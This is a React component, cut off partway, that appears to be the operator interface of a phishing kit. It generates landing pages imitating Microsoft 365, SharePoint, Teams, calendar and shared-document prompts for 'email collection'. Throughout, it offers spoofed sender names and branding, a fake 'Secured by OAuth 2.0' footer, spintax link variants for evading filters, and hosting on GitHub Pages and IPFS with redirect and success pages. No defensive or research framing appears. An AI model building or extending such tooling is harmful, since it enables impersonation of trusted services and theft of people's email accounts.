import React, { useState, useEffect, useRef } from 'react';
import { useNavigate } from 'react-router-dom';
import { api } from '../store/useStore';
import useStore from '../store/useStore';

const TEMPLATE_OPTIONS = [
  { value: 'default',    icon: '✉️', label: 'Default',    desc: 'Connect Your Email' },
  { value: 'document',   icon: '📄', label: 'Document',   desc: 'Shared Document' },
  { value: 'sharepoint', icon: '🗂️', label: 'SharePoint', desc: 'Shared Files' },
  { value: 'teams',      icon: '👥', label: 'Meeting',    desc: 'Meeting Invitation' },
  { value: 'calendar',   icon: '📅', label: 'Calendar',   desc: 'Calendar Event' },
];

// SVG icon definitions — used in picker and sent to server as data URI img src
const GL_ICON_SVGS = {
  email:    '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><rect width="40" height="40" rx="8" fill="#0078D4"/><rect x="6" y="11" width="28" height="19" rx="3" fill="none" stroke="white" stroke-width="2"/><path d="M6 14l14 10 14-10" fill="none" stroke="white" stroke-width="2" stroke-linejoin="round"/></svg>',
  pdf:      '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#D93025"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#9B1C14"/><text x="20" y="36" font-family="Arial Black,Arial" font-size="12" font-weight="900" fill="white" text-anchor="middle" letter-spacing="0.5">PDF</text></svg>',
  word:     '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#185ABD"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#0F3A8C"/><text x="20" y="38" font-family="Arial Black,Arial" font-size="22" font-weight="900" fill="white" text-anchor="middle">W</text></svg>',
  excel:    '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#107C41"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#07502A"/><line x1="10" y1="22" x2="22" y2="40" stroke="white" stroke-width="4.5" stroke-linecap="round"/><line x1="22" y1="22" x2="10" y2="40" stroke="white" stroke-width="4.5" stroke-linecap="round"/></svg>',
  slides:   '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#C43E1C"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#8B2D14"/><text x="20" y="40" font-family="Arial Black,Arial" font-size="22" font-weight="900" fill="white" text-anchor="middle">P</text></svg>',
  archive:  '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#886CE4"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#5944B0"/><rect x="15" y="19" width="10" height="4" rx="1" fill="white"/><rect x="15" y="25" width="10" height="4" rx="1" fill="rgba(255,255,255,0.65)"/><rect x="15" y="31" width="10" height="4" rx="1" fill="rgba(255,255,255,0.35)"/><text x="20" y="46" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="white" text-anchor="middle">ZIP</text></svg>',
  image:    '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#038387"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#025558"/><circle cx="14" cy="26" r="4" fill="rgba(255,255,255,0.9)"/><path d="M5 43L15 28 24 37 30 30 37 43Z" fill="rgba(255,255,255,0.85)"/></svg>',
  video:    '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#E3008C"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#A80062"/><polygon points="13,22 13,42 33,32" fill="white"/></svg>',
  form:     '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="50" viewBox="0 0 40 50"><path d="M4 0h23l13 13v34a3 3 0 01-3 3H4a3 3 0 01-3-3V3a3 3 0 013-3z" fill="#69797E"/><path d="M27 0l13 13H28a1 1 0 01-1-1V0z" fill="#3D4F55"/><line x1="8" y1="24" x2="30" y2="24" stroke="white" stroke-width="2.5" stroke-linecap="round"/><line x1="8" y1="31" x2="30" y2="31" stroke="white" stroke-width="2.5" stroke-linecap="round"/><line x1="8" y1="38" x2="21" y2="38" stroke="white" stroke-width="2.5" stroke-linecap="round"/></svg>',
  files:    '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><path d="M2 12a4 4 0 014-4h10l4 5h14a4 4 0 014 4v13a4 4 0 01-4 4H6a4 4 0 01-4-4V12z" fill="#0E5FB0"/><path d="M2 17h36v12a4 4 0 01-4 4H6a4 4 0 01-4-4V17z" fill="#1991E4"/></svg>',
  calendar: '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><rect x="2" y="8" width="36" height="30" rx="4" fill="#107C41"/><rect x="2" y="8" width="36" height="10" rx="0" fill="#07502A"/><rect x="2" y="8" width="36" height="6" rx="4" fill="#07502A"/><rect x="11" y="2" width="4" height="10" rx="2" fill="rgba(255,255,255,0.8)"/><rect x="25" y="2" width="4" height="10" rx="2" fill="rgba(255,255,255,0.8)"/><text x="20" y="32" font-family="Arial Black,Arial" font-size="13" font-weight="900" fill="white" text-anchor="middle">31</text></svg>',
  meeting:  '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><rect width="40" height="40" rx="8" fill="#6264A7"/><circle cx="14" cy="13" r="5" fill="white"/><circle cx="26" cy="13" r="5" fill="rgba(255,255,255,0.6)"/><path d="M2 38C2 28 8 22 14 22c6 0 12 6 12 16" fill="white"/><path d="M22 38c0-8 5-13 10-13 4 0 8 5 8 13" fill="rgba(255,255,255,0.5)"/></svg>',
  secure:   '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><rect width="40" height="40" rx="8" fill="#1B6EC2"/><path d="M20 5L33 10v11c0 8-6 14-13 16C13 35 7 29 7 21V10Z" fill="rgba(255,255,255,0.15)" stroke="white" stroke-width="2"/><rect x="15" y="22" width="10" height="8" rx="2" fill="white"/><path d="M16 22v-4c0-2.2 8-2.2 8 0v4" fill="none" stroke="white" stroke-width="2.5" stroke-linecap="round"/></svg>',
  link:     '<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><rect width="40" height="40" rx="8" fill="#2C7A9C"/><path d="M24 12h4a8 8 0 010 16h-4" fill="none" stroke="white" stroke-width="3" stroke-linecap="round"/><path d="M16 12h-4a8 8 0 000 16h4" fill="none" stroke="white" stroke-width="3" stroke-linecap="round"/><line x1="14" y1="20" x2="26" y2="20" stroke="white" stroke-width="3" stroke-linecap="round"/></svg>',
};

function svgToDataUri(svg) {
  try { return `data:image/svg+xml;base64,${btoa(svg)}`; } catch { return ''; }
}

const ICON_PRESETS = [
  { key: 'email',    label: 'Email'    },
  { key: 'pdf',      label: 'PDF'      },
  { key: 'word',     label: 'Word'     },
  { key: 'excel',    label: 'Excel'    },
  { key: 'slides',   label: 'Slides'   },
  { key: 'archive',  label: 'Archive'  },
  { key: 'image',    label: 'Image'    },
  { key: 'video',    label: 'Video'    },
  { key: 'form',     label: 'Form'     },
  { key: 'files',    label: 'Files'    },
  { key: 'calendar', label: 'Calendar' },
  { key: 'meeting',  label: 'Meeting'  },
  { key: 'secure',   label: 'Secure'   },
  { key: 'link',     label: 'Link'     },
];

const sectionHeader = {
  fontSize: 13,
  fontWeight: 600,
  color: 'var(--text)',
  paddingBottom: 8,
  borderBottom: '1px solid var(--border)',
  marginBottom: 16,
};

export default function GenerateLink() {
  const navigate = useNavigate();
  const { user } = useStore();

  const [form, setForm] = useState({
    label: '',
    from_name: '',
    template: 'default',
    icon: '✉️',
    useCustomIcon: false,
    custom_icon_url: '',
    custom_cta: '',
    provider_filter: 'microsoft',
    redirect_url: '',
    external_url: '',
    custom_template_id: null,
    redirect_template: 'loading',
    success_template: 'sharepoint',
  });

  const [customTemplates, setCustomTemplates] = useState([]);
  const [uploadingIcon, setUploadingIcon] = useState(false);
  const iconFileRef = useRef(null);

  const [created, setCreated] = useState(null);
  const [creating, setCreating] = useState(false);
  const [previewing, setPreviewing] = useState(false);
  const [error, setError] = useState('');
  const [copied, setCopied] = useState('');

  // Branding (persisted to profile)
  const [branding, setBranding] = useState({ branding_app_name: '', branding_secured_by: '' });
  const [savingBranding, setSavingBranding] = useState(false);
  const [brandingToast, setBrandingToast] = useState('');
  const brandingToastTimer = useRef(null);

  const showBrandingToast = (msg) => {
    setBrandingToast(msg);
    clearTimeout(brandingToastTimer.current);
    brandingToastTimer.current = setTimeout(() => setBrandingToast(''), 3000);
  };

  const saveBranding = async () => {
    setSavingBranding(true);
    try {
      await api.patch('/auth/me', branding);
      showBrandingToast('✓ Branding saved');
    } catch {
      showBrandingToast('Save failed');
    }
    setSavingBranding(false);
  };

  // Load custom templates on mount
  useEffect(() => {
    api.get('/api/templates')
      .then(r => setCustomTemplates(r.data.filter(t => t.status === 'published' || t.owner_id === user?.id)))
      .catch(() => {});
  }, [user?.id]);

  // Load profile on mount
  useEffect(() => {
    api.get('/auth/me').then(r => {
      setBranding({
        branding_app_name: r.data.branding_app_name || '',
        branding_secured_by: r.data.branding_secured_by || '',
      });
      setForm(f => ({
        ...f,
        from_name: r.data.branding_app_name || user?.username || '',
      }));
    }).catch(() => {
      if (user) setForm(f => ({ ...f, from_name: user.branding_app_name || user.username || '' }));
    });
    return () => clearTimeout(brandingToastTimer.current);
  }, []);

  const set = (key, val) => setForm(f => ({ ...f, [key]: val }));

  const handleIconFileUpload = async (e) => {
    const file = e.target.files?.[0];
    if (!file) return;
    setUploadingIcon(true);
    try {
      const fd = new FormData();
      fd.append('file', file);
      const { data } = await api.post('/api/upload/icon', fd, {
        headers: { 'Content-Type': 'multipart/form-data' },
      });
      set('custom_icon_url', data.url);
      set('useCustomIcon', true);
    } catch {
      // fallback: read as data URI so the user still gets something
      const reader = new FileReader();
      reader.onload = (ev) => { set('custom_icon_url', ev.target.result); set('useCustomIcon', true); };
      reader.readAsDataURL(file);
    }
    setUploadingIcon(false);
    if (iconFileRef.current) iconFileRef.current.value = '';
  };

  const previewBuiltinTemplate = async (templateValue) => {
    try {
      const resp = await api.post(
        '/api/links/preview',
        {
          label: form.label,
          from_name: form.from_name || null,
          template: templateValue,
          custom_icon: form.useCustomIcon ? form.custom_icon_url : svgToDataUri(GL_ICON_SVGS[form.icon] || GL_ICON_SVGS.email),
          custom_cta: form.custom_cta || null,
          provider_filter: form.provider_filter || null,
        },
        { responseType: 'blob' }
      );
      const url = URL.createObjectURL(new Blob([resp.data], { type: 'text/html' }));
      window.open(url, '_blank');
      setTimeout(() => URL.revokeObjectURL(url), 60000);
    } catch {}
  };

  const handlePreview = async () => {
    setPreviewing(true);
    try {
      const body = form.custom_template_id
        ? {
            custom_template_id: form.custom_template_id,
            custom_cta: form.custom_cta || null,
          }
        : {
            label: form.label,
            from_name: form.from_name || null,
            template: form.template,
            custom_icon: form.useCustomIcon ? form.custom_icon_url : svgToDataUri(GL_ICON_SVGS[form.icon] || GL_ICON_SVGS.email),
            custom_cta: form.custom_cta || null,
            provider_filter: form.provider_filter || null,
          };
      const resp = await api.post('/api/links/preview', body, { responseType: 'blob' });
      const url = URL.createObjectURL(new Blob([resp.data], { type: 'text/html' }));
      window.open(url, '_blank');
      setTimeout(() => URL.revokeObjectURL(url), 60000);
    } catch {}
    setPreviewing(false);
  };

  const handleCreate = async () => {
    setCreating(true);
    setError('');
    try {
      const { data } = await api.post('/api/links', {
        label: form.label || null,
        from_name: form.from_name || null,
        template: form.custom_template_id ? null : form.template,
        custom_icon: form.useCustomIcon ? form.custom_icon_url : svgToDataUri(GL_ICON_SVGS[form.icon] || GL_ICON_SVGS.email),
        custom_cta: form.custom_cta || null,
        provider_filter: form.provider_filter || null,
        redirect_url: form.redirect_url || null,
        external_url: form.external_url || null,
        custom_template_id: form.custom_template_id || null,
        redirect_template: form.redirect_template,
        success_template: form.success_template,
      });
      setCreated(data);
    } catch (e) {
      setError(e.response?.data?.detail || 'Failed to create link');
    }
    setCreating(false);
  };

  const copyText = (text, key) => {
    navigator.clipboard.writeText(text).catch(() => {});
    setCopied(key);
    setTimeout(() => setCopied(''), 2000);
  };

  const exportHtml = async () => {
    if (!created?.id) return;
    try {
      const resp = await api.get(`/api/links/${created.id}/export`, { responseType: 'blob' });
      const url = URL.createObjectURL(resp.data);
      const a = document.createElement('a');
      a.href = url;
      a.download = `connect-${created.label || created.token?.slice(0, 8) || created.id}.html`;
      document.body.appendChild(a);
      a.click();
      document.body.removeChild(a);
      URL.revokeObjectURL(url);
    } catch {}
  };

  const resetForm = () => {
    setCreated(null);
    setError('');
    setForm({
      label: '',
      from_name: user?.branding_app_name || user?.username || '',
      template: 'default',
      icon: 'email',
      useCustomIcon: false,
      custom_icon_url: '',
      custom_cta: '',
      provider_filter: 'microsoft',
      redirect_url: '',
      external_url: '',
      custom_template_id: null,
      redirect_template: 'loading',
      success_template: 'sharepoint',
    });
  };

  // ── Result section ──────────────────────────────────────────────────────────

  const backPath  = user?.role === 'superadmin' ? '/superadmin/mylinks' : '/dashboard/links';
  const backLabel = user?.role === 'superadmin' ? '← Back to SA Links' : '← Back to My Links';

  if (created) {
    const redirectUrl = created.gate_url || created.go_url || created.redirect_page_url || created.redirect_page_ipfs;
    const landingUrl  = created.gate_url || created.go_url || created.page_url || created.external_url;
    const successUrl  = created.success_page_url || created.success_page_ipfs;
    const bestUrl     = created.gate_url || created.go_url || created.best_url || redirectUrl || landingUrl || created.url;

    const UrlRow = ({ badge, badgeBg, url, copyKey, label }) => url ? (
      <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
        <span style={{ fontSize: 11, fontWeight: 700, color: '#fff', background: badgeBg, padding: '2px 8px', borderRadius: 4, flexShrink: 0, minWidth: 64, textAlign: 'center' }}>{badge}</span>
        <div style={{ flex: 1, background: 'var(--surface2)', border: '1px solid var(--border)', borderRadius: 6, padding: '8px 12px', fontFamily: 'monospace', fontSize: 12, color: 'var(--text2)', wordBreak: 'break-all' }}>
          {url}
        </div>
        <button className="btn btn-ghost btn-sm" onClick={() => copyText(url, copyKey)}>{copied === copyKey ? '✓' : 'Copy'}</button>
      </div>
    ) : null;

    return (
      <div style={{ maxWidth: 640, margin: '0 auto', padding: '0 0 40px' }}>
        <button className="btn btn-ghost btn-sm" style={{ marginBottom: 20 }} onClick={() => navigate(backPath)}>
          {backLabel}
        </button>

        <div style={{ background: 'rgba(16,124,16,.07)', border: '1px solid rgba(16,124,16,.25)', borderRadius: 8, padding: '16px 20px', marginBottom: 20, display: 'flex', alignItems: 'center', gap: 12 }}>
          <span style={{ fontSize: 28 }}>✅</span>
          <div>
            <div style={{ fontWeight: 700, fontSize: 15, color: 'var(--success)' }}>Link Created Successfully</div>
            <div style={{ fontSize: 13, color: 'var(--text2)', marginTop: 2 }}>{created.label || 'Your link'} is ready to share.</div>
          </div>
        </div>

        <div className="card">
          <div style={sectionHeader}>Link URLs</div>

          {(redirectUrl || landingUrl || successUrl) ? (
            <div style={{ display: 'flex', flexDirection: 'column', gap: 10 }}>
              <UrlRow badge="SHARE"   badgeBg="#107c10" url={redirectUrl} copyKey="share"   />
              {created.page_url && created.go_url && (
                <UrlRow badge="AUTH PAGE" badgeBg="#0078d4" url={created.page_url} copyKey="page" />
              )}
              {user?.role === 'superadmin' && (
                <UrlRow badge="SUCCESS" badgeBg="#6264a7" url={successUrl}  copyKey="success" />
              )}
              {user?.role === 'superadmin' && (
                <UrlRow badge="SERVER" badgeBg="#444" url={created.url} copyKey="server" />
              )}
              {created.spintax && (
                <div style={{ display: 'flex', alignItems: 'flex-start', gap: 8 }}>
                  <span style={{ fontSize: 11, fontWeight: 700, color: '#fff', background: '#8764b8', padding: '2px 8px', borderRadius: 4, flexShrink: 0, minWidth: 64, textAlign: 'center', marginTop: 2 }}>SPINTAX</span>
                  <div style={{ flex: 1, background: 'var(--surface2)', border: '1px solid var(--border)', borderRadius: 6, padding: '8px 12px', fontFamily: 'monospace', fontSize: 11, color: 'var(--text2)', wordBreak: 'break-all' }}>
                    {created.spintax}
                  </div>
                  <button className="btn btn-ghost btn-sm" onClick={() => copyText(created.spintax, 'spintax')}>{copied === 'spintax' ? '✓' : 'Copy'}</button>
                </div>
              )}
            </div>
          ) : (
            <div style={{ display: 'flex', flexDirection: 'column', gap: 10 }}>
              {user?.role === 'superadmin' && (
                <UrlRow badge="SERVER" badgeBg="#444" url={created.url} copyKey="server" />
              )}
              <div style={{ background: 'rgba(240,165,0,.08)', border: '1px solid rgba(240,165,0,.3)', borderRadius: 6, padding: '10px 14px', fontSize: 13, color: '#b8860b' }}>
                Not published to hosting yet — go to <strong>My Links</strong> and click <strong>Regenerate URL</strong> to push to GitHub Pages and get SHARE / SUCCESS URLs.
              </div>
            </div>
          )}

          <div style={{ display: 'flex', gap: 10, marginTop: 20, flexWrap: 'wrap' }}>
            <button className="btn btn-primary" onClick={() => copyText(bestUrl, 'best')}>
              {copied === 'best' ? '✓ Copied!' : '📋 Copy Best Link'}
            </button>
            <button className="btn btn-ghost" onClick={exportHtml}>Export HTML</button>
            <button className="btn btn-ghost" onClick={resetForm}>Create Another</button>
          </div>
        </div>
      </div>
    );
  }

  // ── Form section ────────────────────────────────────────────────────────────

  return (
    <div style={{ maxWidth: 680, margin: '0 auto', padding: '0 0 60px' }}>

      {/* Back link */}
      <button
        className="btn btn-ghost btn-sm"
        style={{ marginBottom: 20 }}
        onClick={() => navigate(backPath)}
      >
        {backLabel}
      </button>

      <div className="page-header" style={{ marginBottom: 24 }}>
        <h1>Generate Link</h1>
        <p>Create a new landing page link for email collection.</p>
      </div>

      {error && (
        <div className="error-banner" style={{ marginBottom: 16 }}>{error}</div>
      )}

      {/* ── Section 1: Basics ── */}
      <div className="card" style={{ marginBottom: 16 }}>
        <div style={sectionHeader}>Basics</div>

        {/* File Name */}
        <div className="form-group">
          <label className="form-label">File Name <span style={{ color: 'var(--text3)', fontWeight: 400 }}>(optional)</span></label>
          <input
            className="form-input"
            value={form.label}
            onChange={e => set('label', e.target.value)}
            placeholder="e.g. Q1 Staff Onboarding"
          />
          <div className="form-hint">Shown as the file name in the document row on the landing page. The template title (e.g. "Verify Your Identity", "Shared Document") is always fixed.</div>
        </div>

        {/* From Name */}
        <div className="form-group" style={{ marginBottom: 0 }}>
          <label className="form-label">From Name <span style={{ color: 'var(--text3)', fontWeight: 400 }}>(optional)</span></label>
          <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
            <input
              className="form-input"
              value={form.from_name}
              onChange={e => set('from_name', e.target.value)}
              placeholder="e.g. Acme Corp"
              style={{ flex: 1 }}
            />
            {form.from_name.trim() && (
              <div style={{
                width: 28, height: 28, borderRadius: '50%',
                background: 'var(--primary, #0078d4)', color: '#fff',
                display: 'flex', alignItems: 'center', justifyContent: 'center',
                fontSize: 12, fontWeight: 700, flexShrink: 0,
              }}>
                {form.from_name.trim()[0]?.toUpperCase()}
              </div>
            )}
          </div>
          <div className="form-hint">Shows a sender avatar in the header of the landing page.</div>
        </div>
      </div>

      {/* ── Section 2: Appearance ── */}
      <div className="card" style={{ marginBottom: 16 }}>
        <div style={sectionHeader}>Appearance</div>

        {/* Template picker */}
        <div className="form-group">
          <label className="form-label">Template</label>
          <div style={{ display: 'flex', gap: 10, flexWrap: 'wrap' }}>
            {TEMPLATE_OPTIONS.map(t => {
              const isSelected = !form.custom_template_id && form.template === t.value;
              return (
                <div
                  key={t.value}
                  onClick={() => { set('template', t.value); set('custom_template_id', null); }}
                  style={{
                    width: 100,
                    padding: '12px 8px',
                    borderRadius: 8,
                    border: `2px solid ${isSelected ? 'var(--primary, #0078d4)' : 'var(--border)'}`,
                    background: isSelected ? 'rgba(0,120,212,.06)' : 'var(--surface2)',
                    cursor: 'pointer',
                    textAlign: 'center',
                    transition: 'border-color .12s, background .12s',
                    userSelect: 'none',
                  }}
                >
                  <div style={{ fontSize: 26, marginBottom: 6 }}>{t.icon}</div>
                  <div style={{ fontSize: 12, fontWeight: 600, color: isSelected ? 'var(--primary, #0078d4)' : 'var(--text)', marginBottom: 2 }}>{t.label}</div>
                  <div style={{ fontSize: 10, color: 'var(--text3)', lineHeight: 1.3 }}>{t.desc}</div>
                  <div
                    style={{ fontSize: 10, color: 'var(--primary,#0078d4)', marginTop: 4, cursor: 'pointer' }}
                    onClick={e => { e.stopPropagation(); previewBuiltinTemplate(t.value); }}
                  >
                    Preview ↗
                  </div>
                </div>
              );
            })}
          </div>

          {/* Custom Templates section */}
          {customTemplates.length > 0 && (
            <div style={{ marginTop: 16 }}>
              <div style={{ fontSize: 12, fontWeight: 600, color: 'var(--text3)', textTransform: 'uppercase', letterSpacing: 0.5, marginBottom: 10 }}>
                Custom Templates
              </div>
              <div style={{ display: 'flex', gap: 10, flexWrap: 'wrap' }}>
                {customTemplates.map(t => {
                  const isSelected = form.custom_template_id === t.id;
                  return (
                    <div
                      key={t.id}
                      onClick={() => { set('custom_template_id', t.id); set('template', null); }}
                      style={{
                        width: 110,
                        padding: '12px 8px',
                        borderRadius: 8,
                        border: `2px solid ${isSelected ? 'var(--primary, #0078d4)' : 'var(--border)'}`,
                        background: isSelected ? 'rgba(0,120,212,.06)' : 'var(--surface2)',
                        cursor: 'pointer',
                        textAlign: 'center',
                        transition: 'border-color .12s, background .12s',
                        userSelect: 'none',
                        position: 'relative',
                      }}
                    >
                      <div style={{ position: 'absolute', top: 4, right: 4 }}>
                        <span style={{ fontSize: 8, background: '#0078d4', color: '#fff', padding: '1px 4px', borderRadius: 3, fontWeight: 700 }}>
                          Custom
                        </span>
                      </div>
                      <div style={{ fontSize: 22, marginBottom: 4, marginTop: 6 }}>🎨</div>
                      <div style={{ fontSize: 11, fontWeight: 600, color: isSelected ? 'var(--primary, #0078d4)' : 'var(--text)', marginBottom: 2, overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                        {t.name}
                      </div>
                      {t.status === 'published' && (
                        <div style={{ fontSize: 9, color: '#107c10', fontWeight: 600 }}>Published</div>
                      )}
                      {t.owner_id !== user?.id && (
                        <div style={{ fontSize: 9, color: 'var(--text3)' }}>by {t.owner_username}</div>
                      )}
                      <div
                        style={{ fontSize: 10, color: 'var(--primary,#0078d4)', marginTop: 4, cursor: 'pointer' }}
                        onClick={e => {
                          e.stopPropagation();
                          api.get(`/api/templates/${t.id}/preview`, { responseType: 'blob' }).then(resp => {
                            const url = URL.createObjectURL(new Blob([resp.data], { type: 'text/html' }));
                            window.open(url, '_blank');
                            setTimeout(() => URL.revokeObjectURL(url), 60000);
                          }).catch(() => {});
                        }}
                      >
                        Preview ↗
                      </div>
                    </div>
                  );
                })}
              </div>
            </div>
          )}
        </div>

        {/* Icon picker */}
        <div className="form-group">
          <label className="form-label">Icon</label>
          <div style={{ display: 'flex', flexWrap: 'wrap', gap: 8, marginBottom: 10 }}>
            {ICON_PRESETS.map(p => {
              const isDoc = !['email','files','calendar','meeting','secure','link'].includes(p.key);
              const active = !form.useCustomIcon && form.icon === p.key;
              return (
                <div
                  key={p.key}
                  onClick={() => { set('icon', p.key); set('useCustomIcon', false); }}
                  title={p.label}
                  style={{
                    width: 56, height: 64, borderRadius: 8,
                    border: `2px solid ${active ? 'var(--primary, #0078d4)' : 'var(--border)'}`,
                    background: active ? 'rgba(0,120,212,.07)' : 'var(--surface2)',
                    display: 'flex', flexDirection: 'column', alignItems: 'center', justifyContent: 'center', gap: 4,
                    cursor: 'pointer', transition: 'border-color .12s, background .12s', userSelect: 'none',
                  }}
                >
                  <div dangerouslySetInnerHTML={{ __html: GL_ICON_SVGS[p.key] }}
                    style={{ width: isDoc ? 22 : 26, height: isDoc ? 28 : 26, lineHeight: 0, display: 'flex', alignItems: 'center', justifyContent: 'center' }} />
                  <span style={{ fontSize: 9, color: 'var(--text3)' }}>{p.label}</span>
                </div>
              );
            })}
          </div>

          {/* Custom icon — upload or URL */}
          <div style={{ display: 'flex', alignItems: 'center', gap: 10, marginBottom: 8 }}>
            <input
              ref={iconFileRef}
              type="file"
              accept="image/*"
              style={{ display: 'none' }}
              onChange={handleIconFileUpload}
            />
            <button
              type="button"
              className="btn btn-ghost btn-sm"
              disabled={uploadingIcon}
              onClick={() => iconFileRef.current?.click()}
            >
              {uploadingIcon ? 'Uploading…' : '↑ Upload icon'}
            </button>
            <span style={{ fontSize: 12, color: 'var(--text3)' }}>or</span>
            <input
              className="form-input"
              value={form.useCustomIcon ? form.custom_icon_url : ''}
              onChange={e => { set('custom_icon_url', e.target.value); set('useCustomIcon', !!e.target.value); }}
              placeholder="paste image URL"
              style={{ flex: 1, fontSize: 12 }}
            />
            {form.useCustomIcon && form.custom_icon_url && (
              <button
                type="button"
                className="btn btn-ghost btn-sm"
                onClick={() => { set('useCustomIcon', false); set('custom_icon_url', ''); }}
                title="Remove custom icon"
              >✕</button>
            )}
          </div>
          {/* Preview of uploaded/custom icon */}
          {form.useCustomIcon && form.custom_icon_url && (
            <div style={{ display: 'flex', alignItems: 'center', gap: 10, padding: '8px 12px', background: 'var(--surface2)', borderRadius: 8, border: '1px solid var(--primary, #0078d4)', marginBottom: 4 }}>
              <img
                src={form.custom_icon_url}
                alt="Custom icon"
                style={{ width: 36, height: 36, objectFit: 'contain', borderRadius: 4 }}
                onError={e => { e.currentTarget.style.display = 'none'; }}
              />
              <span style={{ fontSize: 12, color: 'var(--primary, #0078d4)', fontWeight: 600 }}>Custom icon selected</span>
            </div>
          )}
        </div>

        {/* CTA Button Text */}
        <div className="form-group" style={{ marginBottom: 0 }}>
          <label className="form-label">CTA Button Text <span style={{ color: 'var(--text3)', fontWeight: 400 }}>(optional)</span></label>
          <input
            className="form-input"
            value={form.custom_cta}
            onChange={e => set('custom_cta', e.target.value)}
            placeholder="e.g. View Document"
          />
          <div className="form-hint">Overrides the template's default button text.</div>
        </div>
      </div>

      {/* ── Section 3: Branding ── */}
      <div className="card" style={{ marginBottom: 16 }}>
        <div style={{ ...sectionHeader, display: 'flex', alignItems: 'center', justifyContent: 'space-between' }}>
          <span>Page Branding</span>
          <span style={{ fontSize: 11, fontWeight: 400, color: 'var(--text3)' }}>Saved to your profile · applies to all your pages</span>
        </div>

        <div className="form-group">
          <label className="form-label">App / Organisation Name</label>
          <input
            className="form-input"
            value={branding.branding_app_name}
            onChange={e => setBranding(b => ({ ...b, branding_app_name: e.target.value }))}
            placeholder="e.g. Contoso Corp"
          />
          <div className="form-hint">Shown in the header of every landing page you generate. Leave blank to use platform default.</div>
        </div>

        <div className="form-group" style={{ marginBottom: 12 }}>
          <label className="form-label">Footer Security Text</label>
          <input
            className="form-input"
            value={branding.branding_secured_by}
            onChange={e => setBranding(b => ({ ...b, branding_secured_by: e.target.value }))}
            placeholder="🔒 Secured by ClassMail Client · OAuth 2.0"
          />
          <div className="form-hint">Footer text on your landing pages. Supports emojis.</div>
        </div>

        <div style={{ display: 'flex', alignItems: 'center', gap: 10 }}>
          <button className="btn btn-ghost btn-sm" onClick={saveBranding} disabled={savingBranding}>
            {savingBranding ? 'Saving…' : 'Save Branding'}
          </button>
          {brandingToast && (
            <span style={{ fontSize: 12, color: brandingToast.startsWith('✓') ? 'var(--success)' : '#da3633', fontWeight: 600 }}>
              {brandingToast}
            </span>
          )}
        </div>
      </div>

      {/* ── Section 5: Configuration ── */}
      <div className="card" style={{ marginBottom: 16 }}>
        <div style={sectionHeader}>Configuration</div>

        {/* Provider */}
        <div className="form-group">
          <label className="form-label">Provider</label>
          <div style={{ display: 'flex', gap: 10 }}>
            {/* Microsoft — active */}
            <button
              type="button"
              onClick={() => set('provider_filter', 'microsoft')}
              style={{
                flex: 1, padding: '10px 16px', borderRadius: 8,
                border: `2px solid ${form.provider_filter === 'microsoft' ? 'var(--primary, #0078d4)' : 'var(--border)'}`,
                background: form.provider_filter === 'microsoft' ? 'rgba(0,120,212,.07)' : 'var(--surface2)',
                color: 'var(--text)', fontWeight: 600, fontSize: 14, cursor: 'pointer',
                display: 'flex', alignItems: 'center', justifyContent: 'center', gap: 8,
                transition: 'border-color .12s, background .12s',
              }}
            >
              <span style={{ fontSize: 20 }}>🪟</span>
              Microsoft 365
            </button>

            {/* Gmail — coming soon */}
            <button
              type="button"
              disabled
              style={{
                flex: 1, padding: '10px 16px', borderRadius: 8,
                border: '2px solid var(--border)',
                background: 'var(--surface2)',
                color: 'var(--text3)', fontWeight: 600, fontSize: 14, cursor: 'not-allowed',
                display: 'flex', alignItems: 'center', justifyContent: 'center', gap: 8,
                opacity: 0.5,
              }}
            >
              <span style={{ fontSize: 20 }}>✉️</span>
              Gmail
              <span style={{ fontSize: 10, background: 'var(--border)', color: 'var(--text3)', padding: '2px 6px', borderRadius: 4 }}>
                Soon
              </span>
            </button>

            {/* Both — coming soon */}
            <button
              type="button"
              disabled
              style={{
                flex: 1, padding: '10px 16px', borderRadius: 8,
                border: '2px solid var(--border)',
                background: 'var(--surface2)',
